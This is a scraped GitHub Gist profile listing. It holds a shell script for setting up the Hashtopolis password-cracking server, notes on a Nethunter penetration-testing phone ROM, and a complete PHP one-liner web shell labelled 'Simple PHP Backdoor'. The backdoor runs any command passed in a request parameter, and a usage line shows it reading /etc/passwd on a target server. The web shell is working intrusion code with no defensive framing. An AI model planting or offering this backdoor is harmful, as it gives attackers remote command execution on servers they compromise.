Skip to content

Instantly share code, notes, and snippets.

View tomasvanagas's full-sized avatar

Tomas Vanagas tomasvanagas

View GitHub Profile
@linuxbiekaisar
linuxbiekaisar / hashtopolis.sh
Last active February 4, 2022 19:53
How to setup hashtopolis in Ubuntu
#!/bin/sh
# Login as root
sudo su
# update system and install mysql
apt update
apt-get install mysql-server
# install different repository
@binkybear
binkybear / NETHUNTEROS.MD
Last active March 31, 2024 04:57
Nethunter ROM on Nexus 5 & 6P with Nexmon (testing only)

Nethunter OS on Nexus 5/Nexus 6P

Here are instructions to install Nethunter (as a ROM) with working native monitor mode in the chroot using Nexmon. The ROM is a modified CM 14.1 (nougat) base with custom kernel which supports: HID, Drivedroid, Kexec, and external wireless.

What you need

You will need the following 3 items (maybe 4):

Nexus 5 Devices:

<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>